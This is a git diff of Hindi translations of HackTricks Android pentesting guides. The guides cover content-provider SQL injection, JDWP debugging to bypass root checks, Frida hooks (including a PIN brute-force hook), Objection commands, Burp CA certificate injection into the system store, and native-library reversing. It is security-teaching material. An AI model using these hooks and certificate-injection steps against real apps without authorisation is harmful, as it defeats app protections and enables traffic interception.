SQL इंजेक्शन **(SQLite)** के लिए परीक्षण करना सरल है **प्रोजेक्शन** और **चयन फ़ील्ड** को मैनिपुलेट करके जो कंटेंट प्रोवाइडर को पास किए जाते हैं।\
SQL इंजेक्शन **(SQLite)** के लिए परीक्षण करना सरल है **प्रोजेक्शन** और **चयन फ़ील्ड्स** को मैनिपुलेट करके जो कंटेंट प्रोवाइडर को पास किए जाते हैं।\
कंटेंट प्रोवाइडर को क्वेरी करते समय जानकारी खोजने के लिए 2 दिलचस्प तर्क हैं: _--selection_ और _--projection_:
![](<../../../images/image (784).png>)

22
src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
View File

@ -1,16 +1,16 @@
# Exploiting a debuggeable application
# एक डिबग करने योग्य एप्लिकेशन का शोषण
{{#include ../../banners/hacktricks-training.md}}
# **रूट और डिबग करने योग्य जांचों को बायपास करना**
इस पोस्ट का यह भाग [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0) से एक सारांश है।
इस पोस्ट का यह खंड [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0) से एक सारांश है।
## Android ऐप को डिबग करने योग्य बनाने और जांचों को बायपास करने के चरण
## एक Android ऐप को डिबग करने योग्य बनाने और जांचों को बायपास करने के चरण
### **ऐप को डिबग करने योग्य बनाना**
सामग्री आधारित है https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0
सामग्री https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0 पर आधारित है।
1. **APK को डिकंपाइल करें:**
@ -24,7 +24,7 @@
3. **पैकेज नाम प्राप्त करें:**
- तीसरे पक्ष के अनुप्रयोगों की सूची बनाने और पैकेज नाम खोजने के लिए `adb shell pm list packages 3` चलाएँ।
- तीसरे पक्ष के एप्लिकेशनों की सूची बनाने और पैकेज नाम खोजने के लिए `adb shell pm list packages 3` चलाएँ।
4. **ऐप को डिबगर कनेक्शन की प्रतीक्षा करने के लिए सेट करें:**
@ -53,15 +53,15 @@
![https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png](https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png)
ये चरण सामूहिक रूप से सुनिश्चित करते हैं कि एप्लिकेशन को डिबग किया जा सके और कुछ सुरक्षा जांचों को डिबगर का उपयोग करके बायपास किया जा सके, जिससे एप्लिकेशन के व्यवहार का अधिक गहन विश्लेषण या संशोधन संभव हो सके।
ये चरण सामूहिक रूप से सुनिश्चित करते हैं कि एप्लिकेशन को डिबग किया जा सके और कि कुछ सुरक्षा जांचों को डिबगर का उपयोग करके बायपास किया जा सके, जिससे एप्लिकेशन के व्यवहार का अधिक गहन विश्लेषण या संशोधन संभव हो सके।
चरण 2 में फ्लैग मान को 814267972 में बदलना शामिल है, जो बाइनरी में 110000101101000000100010100 के रूप में दर्शाया गया है।
# **एक कमजोरियों का शोषण करना**
# **एक भेद्यता का शोषण**
एक कमजोर एप्लिकेशन का प्रदर्शन किया गया जिसमें एक बटन और एक टेक्स्टव्यू था। प्रारंभ में, एप्लिकेशन "Crack Me" प्रदर्शित करता है। लक्ष्य रनटाइम पर "Try Again" से "Hacked" संदेश को बदलना है, बिना स्रोत कोड को संशोधित किए।
## **कमजोरी की जांच करना**
## **भेद्यता की जांच करना**
- एप्लिकेशन को `apktool` का उपयोग करके डिकंपाइल किया गया ताकि `AndroidManifest.xml` फ़ाइल तक पहुँच प्राप्त की जा सके।
- AndroidManifest.xml में `android_debuggable="true"` की उपस्थिति यह संकेत करती है कि एप्लिकेशन डिबग करने योग्य है और शोषण के लिए संवेदनशील है।
@ -69,9 +69,9 @@
## **सेटअप तैयार करना**
- प्रक्रिया में एक एमुलेटर शुरू करना, कमजोर एप्लिकेशन स्थापित करना, और `adb jdwp` का उपयोग करके सुनने वाले डलविक वीएम पोर्ट की पहचान करना शामिल था।
- JDWP (Java Debug Wire Protocol) एक एप्लिकेशन को वीएम में चलाने के लिए डिबगिंग की अनुमति देता है, एक अद्वितीय पोर्ट को उजागर करके।
- दूरस्थ डिबगिंग के लिए पोर्ट फॉरवर्डिंग आवश्यक थ, इसके बाद JDB को लक्षित एप्लिकेशन से जोड़ा गया।
- प्रक्रिया में एक एमुलेटर शुरू करना, कमजोर एप्लिकेशन स्थापित करना, और `adb jdwp` का उपयोग करके सुनने वाले डलविक वीएम पोर्ट की पहचान करना शामिल था।
- JDWP (Java Debug Wire Protocol) एक एप्लिकेशन को VM में चलाने के लिए डिबगिंग की अनुमति देता है, एक अद्वितीय पोर्ट को उजागर करके।
- दूरस्थ डिबगिंग के लिए पोर्ट फॉरवर्डिंग आवश्यक थ, इसके बाद JDB को लक्षित एप्लिकेशन से जोड़ा गया।
## **रनटाइम पर कोड इंजेक्ट करना**

8
src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
View File

@ -10,12 +10,12 @@
pip install frida-tools
pip install frida
```
**Android में डाउनलोड और इंस्टॉल करें** **frida server** ([Download the latest release](https://github.com/frida/frida/releases)).\
**एंड्रॉइड में डाउनलोड और इंस्टॉल करें** **फ्रिडा सर्वर** ([नवीनतम रिलीज़ डाउनलोड करें](https://github.com/frida/frida/releases)).\
रूट मोड में adb को पुनः प्रारंभ करने, इससे कनेक्ट करने, frida-server अपलोड करने, कार्यान्वयन अनुमतियाँ देने और इसे बैकग्राउंड में चलाने के लिए एक-लाइनर:
```bash
adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local/tmp/; adb shell "chmod 755 /data/local/tmp/frida-server"; adb shell "/data/local/tmp/frida-server &"
```
**जांचें** कि यह **काम कर रहा** है:
**जांचें** कि यह **काम कर रहा है**:
```bash
frida-ps -U #List packages and processes
frida-ps -U | grep -i <part_of_the_package_name> #Get all the package name
@ -105,7 +105,7 @@ send("MainActivity.onCreate() HIT!!!")
var ret = this.onCreate.overload("android.os.Bundle").call(this, var_0)
}
```
Android के `.onCreate()` को हुक करें
एंड्रॉइड `.onCreate()` को हुक करें
```javascript
var activity = Java.use("android.app.Activity")
activity.onCreate.overload("android.os.Bundle").implementation = function (
@ -161,7 +161,7 @@ return ret
यदि आप किसी बनाए गए ऑब्जेक्ट के कुछ गुण निकालना चाहते हैं, तो आप इसका उपयोग कर सकते हैं।
इस उदाहरण में, आप देखेंगे कि कैसे my_activity क्लास का ऑब्जेक्ट प्राप्त किया जाए और कैसे .secret() फ़ंक्शन को कॉल किया जाए जो ऑब्जेक्ट के एक निजी गुण को प्रिंट करेगा:
इस उदाहरण में, आप देखेंगे कि कैसे my_activity क्लास का ऑब्जेक्ट प्राप्त करें और कैसे .secret() फ़ंक्शन को कॉल करें जो ऑब्जेक्ट के एक निजी गुण को प्रिंट करेगा:
```javascript
Java.choose("com.example.a11x256.frida_test.my_activity", {
onMatch: function (instance) {

8
src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
View File

@ -8,7 +8,7 @@
## Python
Frida आपको **JavaScript कोड** को एक चल रहे एप्लिकेशन के कार्यों के अंदर **डालने** की अनुमति देता है। लेकिन आप **python** का उपयोग **hooks** को **call** करने और यहां तक कि **hooks** के साथ **interact** करने के लिए कर सकते हैं।
Frida आपको **JavaScript कोड** को एक चल रहे एप्लिकेशन के फ़ंक्शनों के अंदर **डालने** की अनुमति देता है। लेकिन आप **python** का उपयोग **hooks** को **call** करने और यहां तक कि **hooks** के साथ **interact** करने के लिए कर सकते हैं।
यह एक आसान python स्क्रिप्ट है जिसे आप इस ट्यूटोरियल में सभी प्रस्तावित उदाहरणों के साथ उपयोग कर सकते हैं:
```python
@ -49,7 +49,7 @@ return true
```
python hooking.py hook1.js
```
देखें: फ़ंक्शन एक String को पैरामीटर के रूप में प्राप्त करता है, क्या ओवरलोड की आवश्यकता नहीं है?
देखें: फ़ंक्शन एक String को पैरामीटर के रूप में लेता है, क्या ओवरलोड करने की आवश्यकता नहीं है?
## Hook 2 - फ़ंक्शन ब्रूटफोर्स
@ -92,9 +92,9 @@ console.log("[ + ] Found correct PIN: " + i)
}
})
```
## Hook 3 - तर्कों और लौटाने के मान को प्राप्त करना
## Hook 3 - तर्कों और लौटने वाले मान को पुनः प्राप्त करना
आप एक फ़ंक्शन को हुक कर सकते हैं और इसे **प्रिंट** करने के लिए बना सकते हैं **पारित तर्कों** का मान और **लौटाने के मान** का मान:
आप एक फ़ंक्शन को हुक कर सकते हैं और इसे **प्रिंट** करने के लिए बना सकते हैं **पारित तर्कों** का मान और **लौटने वाले मान** का मान:
```javascript
//hook3.js
Java.perform(function () {

4
src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md
View File

@ -13,7 +13,7 @@
यहाँ आप देख सकते हैं कि कैसे **एक ही नाम के 2 फ़ंक्शंस को हुक करें** लेकिन अलग-अलग पैरामीटर के साथ।\
इसके अलावा, आप सीखेंगे कि कैसे **अपने खुद के पैरामीटर के साथ एक फ़ंक्शन को कॉल करें**।\
और अंत में, यह एक उदाहरण है कि कैसे **क्लास के एक उदाहरण को खोजें और उसे एक फ़ंक्शन कॉल करने के लिए बनाएं**
और अंत में, एक उदाहरण है कि कैसे **क्लास के एक उदाहरण को खोजें और उसे एक फ़ंक्शन कॉल करने के लिए बनाएं**
```javascript
//s2.js
console.log("Script loaded successfully ");
@ -202,7 +202,7 @@ return this.setText(string_to_recv)
}
})
```
भाग 5 है जिसे मैं समझाने नहीं जा रहा क्योंकि इसमें कुछ नया नहीं है। लेकिन अगर आप इसे पढ़ना चाहते हैं तो यहाँ है: [https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/)
भाग 5 है जिसे मैं समझाने वाला नहीं हूँ क्योंकि इसमें कुछ नया नहीं है। लेकिन अगर आप इसे पढ़ना चाहते हैं तो यहाँ है: [https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/)
{{#include ../../../banners/hacktricks-training.md}}

20
src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
View File

@ -14,7 +14,7 @@
### फिर से शुरू करें
**objection** का **लक्ष्य** उपयोगकर्ता को **Frida द्वारा प्रदान किए गए मुख्य क्रियाओं** को कॉल करने देना है। **अन्यथा**, उपयोगकर्ता को हर अनुप्रयोग के लिए एक **एकल स्क्रिप्ट** बनानी होगी जिसे वह परीक्षण करना चाहता है।
**objection** का **लक्ष्य** उपयोगकर्ता को **Frida द्वारा प्रदान की जाने वाली मुख्य क्रियाओं** को कॉल करने देना है। **अन्यथा**, उपयोगकर्ता को हर अनुप्रयोग के लिए एक **एकल स्क्रिप्ट** बनानी होगी जिसे वह परीक्षण करना चाहता है।
## ट्यूटोरियल
@ -84,9 +84,9 @@ android ui FLAG_SECURE false #This may enable you to take screenshots using the
```
### स्थैतिक विश्लेषण को गतिशील बनाना
एक वास्तविक एप्लिकेशन में, हमें इस भाग में खोजी गई सभी जानकारी का ज्ञान होना चाहिए, इससे पहले कि हम **objection** का उपयोग करें, धन्यवाद **स्थैतिक विश्लेषण**। खैर, इस तरीके से आप शायद **कुछ नया** देख सक हैं क्योंकि यहाँ आपके पास केवल कक्षाओं, विधियों और निर्यातित वस्तुओं की एक पूर्ण सूची होगी।
एक वास्तविक एप्लिकेशन में, हमें इस भाग में खोजी गई सभी जानकारी का ज्ञान होना चाहिए, इससे पहले कि हम **objection** का उपयोग करें, धन्यवाद **स्थैतिक विश्लेषण**। खैर, इस तरीके से आप शायद **कुछ नया** देख सकें क्योंकि यहाँ आपके पास केवल कक्षाओं, विधियों और निर्यातित वस्तुओं की एक पूर्ण सूची होगी।
दि आप किसी तरह एप्लिकेशन का **पढ़ने योग्य स्रोत कोड** प्राप्त करने में **असमर्थ** हैं, तो यह भी उपयोगी है
ह भी उपयोगी है यदि किसी तरह आप ऐप का **पढ़ने योग्य स्रोत कोड** प्राप्त करने में **असमर्थ** हैं।
#### गतिविधियों, रिसीवर्स और सेवाओं की सूची
```bash
@ -97,7 +97,7 @@ android hooking list activities
android hooking list services
android hooking list receivers
```
Frida कोई त्रुटि लॉन्च करेगा यदि कोई नहीं पाया गया
Frida कोई नहीं मिलने पर एक त्रुटि लॉन्च करेगा
#### वर्तमान गतिविधि प्राप्त करना
```bash
@ -107,15 +107,15 @@ android hooking get current_activity
#### क्लासेस खोजें
आइए अपने एप्लिकेशन के अंदर क्लासेस की खोज करना शुरू करें
आइए अपने एप्लिकेशन के अंदर क्लासेस की खोज करना शुरू करें
```bash
android hooking search classes asvid.github.io.fridaapp
```
![](<../../../images/image (507).png>)
#### क क्लास के मेथड्स खोजें
#### किसी क्लास के मेथड्स खोजें
अब हम _MainActivity:_ क्लास के अंदर के मेथड्स को निकालते हैं:
अब हम क्लास _MainActivity:_ के अंदर के मेथड्स को निकालते हैं:
```bash
android hooking search methods asvid.github.io.fridaapp MainActivity
```
@ -135,7 +135,7 @@ android hooking list class_methods asvid.github.io.fridaapp.MainActivity
```bash
android hooking list classes #List all loaded classes, As the target application gets usedmore, this command will return more classes.
```
यह बहुत उपयोगी है यदि आप **क्लास के मेथड को हुक करना चाहते हैं और आपको केवल क्लास का नाम पता है**। आप इस फ़ंक्शन का उपयोग **यह खोजने के लिए कर सकते हैं कि क्लास का मालिक कौन सा मॉड्यूल है** और फिर इसके मेथड को हुक कर सकते हैं।
यह बहुत उपयोगी है यदि आप **क्लास के मेथड को हुक करना चाहते हैं और आपको केवल क्लास का नाम पता है**। आप इस फ़ंक्शन का उपयोग **कर सकते हैं यह खोजने के लिए कि क्लास का कौन सा मॉड्यूल है** और फिर इसके मेथड को हुक कर सकते हैं।
### हुकिंग आसान है
@ -169,7 +169,7 @@ android hooking watch class asvid.github.io.fridaapp.MainActivity --dump-args --
### क्लास उदाहरण
एक विशेष Java क्लास के **लाइव उदाहरणों** की खोज करें और प्रिंट करें, जिसे पूर्ण रूप से योग्य क्लास नाम द्वारा निर्दिष्ट किया गया है। यह एक खोजे गए ऑब्जेक्शन के लिए एक स्ट्रिंग मान प्राप्त करने के प्रयास का परिणाम है, जो आमतौर पर **ऑब्जेक्ट के लिए प्रॉपर्टी मानों** को **शामिल** करेगा।
एक विशिष्ट Java क्लास के **लाइव उदाहरणों** की खोज करें और प्रिंट करें, जिसे पूर्ण रूप से योग्य क्लास नाम द्वारा निर्दिष्ट किया गया है। यह एक खोजे गए ऑब्जेक्शन के लिए एक स्ट्रिंग मान प्राप्त करने के प्रयास का परिणाम है, जो आमतौर पर **ऑब्जेक्ट के लिए प्रॉपर्टी मानों** को **शामिल** करेगा।
```
android heap print_instances <class>
```
@ -222,7 +222,7 @@ exit
## मुझे Objection में क्या कमी लगती है
- हुकिंग विधियाँ कभी-कभी एप्लिकेशन को क्रैश कर देती हैं (यह Frida के कारण भी है)।
- आप कक्षाओं के उदाहरणों का उपयोग करके उदाहरण के कार्यों को कॉल नहीं कर सकते। और आप कक्षाओं के नए उदाहरण नहीं बना सकते और उनका उपयोग करके कार्यों को कॉल नहीं कर सकते।
- आप कक्षाओं के उदाहरणों का उपयोग करके उदाहरण के कार्यों को कॉल नहीं कर सकते। और आप कक्षाओं के नए उदाहरण नहीं बना सकते और उनका उपयोग कार्यों को कॉल करने के लिए नहीं कर सकते।
- एप्लिकेशन द्वारा उपयोग किए जा रहे सभी सामान्य क्रिप्टो विधियों को हुक करने के लिए कोई शॉर्टकट नहीं है (जैसे sslpinnin के लिए) ताकि आप सिफर टेक्स्ट, प्लेन टेक्स्ट, कुंजी, IVs और उपयोग किए गए एल्गोरिदम देख सकें।

8
src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
View File

@ -25,7 +25,7 @@ adb shell mv /sdcard/$CERTHASHNAME /system/etc/security/cacerts/ #Move to correc
adb shell chmod 644 /system/etc/security/cacerts/$CERTHASHNAME #Assign privileges
adb reboot #Now, reboot the machine
```
एक बार जब **मशीन रीबूट करना समाप्त कर दे** तो बर्प प्रमाणपत्र इसका उपयोग कर रहा होगा!
एक बार जब **मशीन रीबूट करना समाप्त कर दे** तो बर्प प्रमाणपत्र इसका उपयोग में होगा!
## मैजिक का उपयोग करना
@ -33,7 +33,7 @@ adb reboot #Now, reboot the machine
[**इस वीडियो**](https://www.youtube.com/watch?v=qQicUW0svB8) में समझाया गया है कि आपको:
1. **एक CA प्रमाणपत्र स्थापित करें**: बस **खींचें और छोड़ें** DER बर्प प्रमाणपत्र को **विस्तार बदलते हुए** `.crt` मोबाइल में ताकि यह डाउनलोड फ़ोल्डर में संग्रहीत हो जाए और `Install a certificate` -> `CA certificate` पर जाएं।
1. **एक CA प्रमाणपत्र स्थापित करें**: बस **खींचें और छोड़ें** DER बर्प प्रमाणपत्र को **विस्तार बदलते हुए** `.crt`ें मोबाइल में ताकि यह डाउनलोड फ़ोल्डर में संग्रहीत हो जाए और `Install a certificate` -> `CA certificate` पर जाएं।
<figure><img src="../../images/image (53).png" alt="" width="164"><figcaption></figcaption></figure>
@ -115,9 +115,9 @@ wait # Launched in parallel - wait for completion here
echo "System certificate injected"
```
### Bind-mounting through NSEnter
### NSEnter के माध्यम से बाइंड-माउंटिंग
1. **Writable Directory सेट करना**: प्रारंभ में, एक writable directory स्थापित की जाती है जो मौजूदा non-APEX सिस्टम सर्टिफिकेट डायरेक्टरी पर `tmpfs` को माउंट करके बनाई जाती है। यह निम्नलिखित कमांड के साथ किया जाता है:
1. **एक लिखने योग्य निर्देशिका सेट करना**: प्रारंभ में, एक लिखने योग्य निर्देशिका स्थापित की जाती है जो मौजूदा गैर-APEX सिस्टम प्रमाणपत्र निर्देशिका के ऊपर `tmpfs` को माउंट करके बनाई जाती है। यह निम्नलिखित कमांड के साथ किया जाता है:
```bash
mount -t tmpfs tmpfs /system/etc/security/cacerts
```

12
src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md
View File

@ -2,9 +2,9 @@
## मैनुअल **डी-ऑबफस्केशन तकनीकें**
**सॉफ़्टवेयर सुरक्षा** के क्षेत्र में, अस्पष्ट कोड को समझने योग्य बनाने की प्रक्रिया, जिसे **डी-ऑबफस्केशन** कहा जाता है, महत्वपूर्ण है। यह गाइड डी-ऑबफस्केशन के विभिन्न रणनीतियों में गहराई से जाती है, स्थिर विश्लेषण तकनीकों और ऑबफस्केशन पैटर्न को पहचानने पर ध्यान केंद्रित करती है। इसके अतिरिक्त, यह व्यावहारिक अनुप्रयोग के लिए एक व्यायाम प्रस्तुत करती है और उन लोगों के लिए आगे के संसाधनों का सुझाव देती है जो अधिक उन्नत विषयों का पता लगाने में रुचि रखते हैं।
**सॉफ़्टवेयर सुरक्षा** के क्षेत्र में, अस्पष्ट कोड को समझने योग्य बनाने की प्रक्रिया, जिसे **डी-ऑबफस्केशन** कहा जाता है, महत्वपूर्ण है। यह गाइड डी-ऑबफस्केशन के विभिन्न रणनीतियों में गहराई से जाती है, स्थैतिक विश्लेषण तकनीकों और ऑबफस्केशन पैटर्न को पहचानने पर ध्यान केंद्रित करती है। इसके अतिरिक्त, यह व्यावहारिक अनुप्रयोग के लिए एक व्यायाम प्रस्तुत करती है और उन लोगों के लिए आगे के संसाधनों का सुझाव देती है जो अधिक उन्नत विषयों का अन्वेषण करना चाहते हैं।
### **स्थिर डी-ऑबफस्केशन के लिए रणनीतियाँ**
### **स्थैतिक डी-ऑबफस्केशन के लिए रणनीतियाँ**
जब **ऑबफस्केटेड कोड** के साथ काम कर रहे होते हैं, तो ऑबफस्केशन की प्रकृति के आधार पर कई रणनीतियाँ अपनाई जा सकती हैं:
@ -16,18 +16,18 @@
ऑबफस्केटेड कोड को पहचानना डी-ऑबफस्केशन प्रक्रिया में पहला कदम है। प्रमुख संकेतक शामिल हैं:
- Java और Android में **स्ट्रिंग्स की अनुपस्थिति या उलझन**, जो स्ट्रिंग ऑबफस्केशन का सुझाव दे सकती है।
- **बाइनरी फ़ाइलों की उपस्थिति** जो एसेट्स निर्देशिका में हैं या `DexClassLoader` को कॉल करती हैं, जो कोड अनपैकिंग और डायनामिक लोडिंग का संकेत देती हैं
- **नेटीव लाइब्रेरी का उपयोग** जो पहचानने योग्य JNI फ़ंक्शंस के साथ है, जो संभावित रूप से नेटीव विधियों के ऑबफस्केशन को इंगित करता है।
- **बाइनरी फ़ाइलों की उपस्थिति** एसेट्स निर्देशिका में या `DexClassLoader` को कॉल करना, जो कोड अनपैकिंग और डायनामिक लोडिंग का संकेत देता है
- **नेटीव लाइब्रेरी का उपयोग** पहचानने योग्य JNI फ़ंक्शंस के साथ, जो संभावित रूप से नेटीव विधियों के ऑबफस्केशन को इंगित करता है।
## **डी-ऑबफस्केशन में डायनामिक विश्लेषण**
नियंत्रित वातावरण में कोड को निष्पादित करके, डायनामिक विश्लेषण **यह देखने की अनुमति देता है कि ऑबफस्केटेड कोड वास्तविक समय में कैसे व्यवहार करता है**। यह विधि विशेष रूप से जटिल ऑबफस्केशन पैटर्न के आंतरिक कार्यों को उजागर करने में प्रभावी है जो कोड के वास्तविक इरादे को छिपाने के लिए डिज़ाइन किए गए हैं।
नियंत्रित वातावरण में कोड को निष्पादित करके, डायनामिक विश्लेषण **यह देखने की अनुमति देता है कि ऑबफस्केटेड कोड वास्तविक समय में कैसे व्यवहार करता है**। यह विधि विशेष रूप से जटिल ऑबफस्केशन पैटर्न के आंतरिक कार्यों को उजागर करने में प्रभावी है, जो कोड के वास्तविक इरादे को छिपाने के लिए डिज़ाइन किए गए हैं।
### **डायनामिक विश्लेषण के अनुप्रयोग**
- **रनटाइम डिक्रिप्शन**: कई ऑबफस्केशन तकनीकों में स्ट्रिंग्स या कोड खंडों को एन्क्रिप्ट करना शामिल होता है जो केवल रनटाइम पर डिक्रिप्ट होते हैं। डायनामिक विश्लेषण के माध्यम से, इन एन्क्रिप्टेड तत्वों को डिक्रिप्शन के क्षण में कैप्चर किया जा सकता है, जिससे उनकी वास्तविक रूप प्रकट होती है।
- **ऑबफस्केशन तकनीकों की पहचान करना**: एप्लिकेशन के व्यवहार की निगरानी करके, डायनामिक विश्लेषण विशिष्ट ऑबफस्केशन तकनीकों की पहचान करने में मदद कर सकता है, जैसे कोड वर्चुअलाइजेशन, पैकर, या डायनामिक कोड जनरेशन।
- **छिपी हुई कार्यक्षमता को उजागर करना**: ऑबफस्केटेड कोड में छिपी हुई कार्यक्षमताएँ हो सकती हैं जो केवल स्थिर विश्लेषण के माध्यम से स्पष्ट नहीं होती हैं। डायनामिक विश्लेषण सभी कोड पथों का अवलोकन करने की अनुमति देता है, जिसमें वे भी शामिल हैं जो शर्तानुसार निष्पादित होते हैं, ताकि ऐसी छिपी हुई कार्यक्षमताओं को उजागर किया जा सके।
- **छिपी हुई कार्यक्षमता को उजागर करना**: ऑबफस्केटेड कोड में छिपी हुई कार्यक्षमताएँ हो सकती हैं जो केवल स्थैतिक विश्लेषण के माध्यम से स्पष्ट नहीं होती हैं। डायनामिक विश्लेषण सभी कोड पथों का अवलोकन करने की अनुमति देता है, जिसमें वे भी शामिल हैं जो शर्तानुसार निष्पादित होते हैं, ताकि ऐसी छिपी हुई कार्यक्षमताओं को उजागर किया जा सके।
## संदर्भ और आगे की पढ़ाई

4
src/mobile-pentesting/android-app-pentesting/react-native-application.md
View File

@ -22,7 +22,7 @@ JavaScript कोड का और विश्लेषण करने के
3. Developer Toolbar में "Sources" पर क्लिक करें। आपको एक JavaScript फ़ाइल दिखाई देगी जो फ़ोल्डरों और फ़ाइलों में विभाजित है, जो मुख्य बंडल बनाती है।
यदि आप `index.android.bundle.map` नामक फ़ाइल पाते हैं, तो आप स्रोत कोड का विश्लेषण अनमिनिफाइड प्रारूप में कर सकेंगे। मैप फ़ाइलों में स्रोत मैपिंग होती है, जो आपको मिनिफाइड पहचानकर्ताओं को मैप करने की अनुमति देती है।
यदि आप `index.android.bundle.map` नामक फ़ाइल पाते हैं, तो आप अनमिनिफाइड प्रारूप में स्रोत कोड का विश्लेषण कर सकेंगे। मैप फ़ाइलों में स्रोत मैपिंग होती है, जो आपको मिनिफाइड पहचानकर्ताओं को मैप करने की अनुमति देती है।
संवेदनशील क्रेडेंशियल्स और एंडपॉइंट्स की खोज करने के लिए, इन चरणों का पालन करें:
@ -32,7 +32,7 @@ JavaScript कोड का और विश्लेषण करने के
3. यह सौभाग्य की बात थी कि पुनः खोज प्रक्रिया के दौरान JavaScript कोड में संवेदनशील हार्ड-कोडेड क्रेडेंशियल्स पाए गए।
## संदर्भ
## References
- [https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)

44
src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
View File

@ -4,41 +4,41 @@
**अधिक जानकारी के लिए देखें:** [**https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html)
एंड्रॉइड ऐप्स प्रदर्शन-क्रिटिकल कार्यों के लिए आमतौर पर C या C++ में लिखी गई नैटिव लाइब्रेरीज़ का उपयोग कर सकते हैं। मैलवेयर निर्माता भी इन लाइब्रेरीज़ का उपयोग करते हैं, क्योंकि इन्हें DEX बाइटकोड की तुलना में रिवर्स इंजीनियर करना कठिन होता है। यह अनुभाग एंड्रॉइड के लिए अनुकूलित रिवर्स इंजीनियरिंग कौशल पर जोर देता है, न कि असेंबली भाषाओं को सिखाने पर। संगतता के लिए ARM और x86 संस्करणों की लाइब्रेरीज़ प्रदान की जाती हैं।
एंड्रॉइड ऐप्स प्रदर्शन-क्रिटिकल कार्यों के लिए आमतौर पर C या C++ में लिखी गई नेटीव लाइब्रेरी का उपयोग कर सकते हैं। मैलवेयर निर्माता भी इन लाइब्रेरी का उपयोग करते हैं, क्योंकि इन्हें DEX बाइटकोड की तुलना में रिवर्स इंजीनियर करना कठिन होता है। यह अनुभाग एंड्रॉइड के लिए अनुकूलित रिवर्स इंजीनियरिंग कौशल पर जोर देता है, न कि असेंबली भाषाओं को सिखाने पर। संगतता के लिए ARM और x86 संस्करणों की लाइब्रेरी प्रदान की जाती हैं।
### मुख्य बिंदु:
- **एंड्रॉइड ऐप्स में नैटिव लाइब्रेरीज़:**
- प्रदर्शन-गहन कार्यों के लिए उपयोग की जाती हैं
- C या C++ में लिखी गई, जिससे रिवर्स इंजीनियरिंग चुनौतीपूर्ण होती है।
- `.so` (शेयर की गई वस्तु) प्रारूप में पाई जाती हैं, जो लिनक्स बाइनरी के समान है।
- मैलवेयर निर्माता विश्लेषण को कठिन बनाने के लिए नैटिव कोड को प्राथमिकता देते हैं।
- **जावा नैटिव इंटरफेस (JNI) और एंड्रॉइड NDK:**
- JNI जावा विधियों को नैटिव कोड में लागू करने की अनुमति देता है।
- NDK नैटिव कोड लिखने के लिए एंड्रॉइड-विशिष्ट उपकरणों का एक सेट है।
- JNI और NDK जावा (या कोटलिन) कोड को नैटिव लाइब्रेरीज़ के साथ जोड़ते हैं।
- **एंड्रॉइड ऐप्स में नेटीव लाइब्रेरी:**
- प्रदर्शन-गहन कार्यों के लिए उपयोग किया जाता है
- C या C++ में लिखा गया, जिससे रिवर्स इंजीनियरिंग चुनौतीपूर्ण हो जाती है।
- `.so` (शेयर की गई वस्तु) प्रारूप में पाया जाता है, जो लिनक्स बाइनरी के समान है।
- मैलवेयर निर्माता विश्लेषण को कठिन बनाने के लिए नेटीव कोड को प्राथमिकता देते हैं।
- **जावा नेटीव इंटरफेस (JNI) और एंड्रॉइड NDK:**
- JNI जावा विधियों को नेटीव कोड में लागू करने की अनुमति देता है।
- NDK नेटीव कोड लिखने के लिए एंड्रॉइड-विशिष्ट उपकरणों का एक सेट है।
- JNI और NDK जावा (या कोटलिन) कोड को नेटीव लाइब्रेरी के साथ जोड़ते हैं।
- **लाइब्रेरी लोडिंग और निष्पादन:**
- लाइब्रेरीज़ को `System.loadLibrary` या `System.load` का उपयोग करके मेमोरी में लोड किया जाता है।
- लाइब्रेरी लोड होने पर JNI_OnLoad निष्पादित होता है।
- जावा द्वारा घोषित नैटिव विधियाँ नैटिव कार्यों से लिंक होती हैं, जिससे निष्पादन सक्षम होता है।
- **जावा विधियों को नैटिव कार्यों से लिंक करना:**
- **डायनामिक लिंकिंग:**ैटिव लाइब्रेरीज़ में कार्यों के नाम एक विशिष्ट पैटर्न से मेल खाते हैं, जिससे स्वचालित लिंकिंग की अनुमति मिलती है।
- **स्टैटिक लिंकिंग:** लिंकिंग के लिए `RegisterNatives` का उपयोग करता है, जो कार्यों के नामकरण और संरचना में लचीलापन प्रदान करता है।
- लाइब्रेरी को `System.loadLibrary` या `System.load` का उपयोग करके मेमोरी में लोड किया जाता है।
- लाइब्रेरी लोडिंग पर JNI_OnLoad निष्पादित होता है।
- जावा द्वारा घोषित नेटीव विधियाँ नेटीव कार्यों से लिंक होती हैं, जिससे निष्पादन सक्षम होता है।
- **जावा विधियों को नेटीव कार्यों से लिंक करना:**
- **डायनामिक लिंकिंग:**ेटीव लाइब्रेरी में कार्यों के नाम एक विशिष्ट पैटर्न से मेल खाते हैं, जिससे स्वचालित लिंकिंग की अनुमति मिलती है।
- **स्टैटिक लिंकिंग:** लिंकिंग के लिए `RegisterNatives` का उपयोग करता है, जो कार्य नामकरण और संरचना में लचीलापन प्रदान करता है।
